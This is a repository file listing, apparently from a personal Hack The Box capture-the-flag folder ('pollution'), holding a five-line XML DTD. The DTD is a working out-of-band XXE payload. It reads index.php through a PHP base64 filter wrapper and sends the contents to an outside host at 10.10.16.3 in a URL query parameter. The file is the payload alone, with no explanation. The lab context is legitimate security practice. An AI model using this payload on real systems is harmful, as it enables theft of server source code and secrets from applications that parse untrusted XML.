Files
CTF/HTB/pollution/xxe.dtd
Simon 82b0759f1e init htb
old htb folders
2023-08-29 21:53:22 +02:00

5 lines
187 B
DTD

<!ENTITY % file SYSTEM 'php://filter/convert.base64-encode/resource=index.php'>
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://10.10.16.3/?file=%file;'>">
%eval;
%exfiltrate;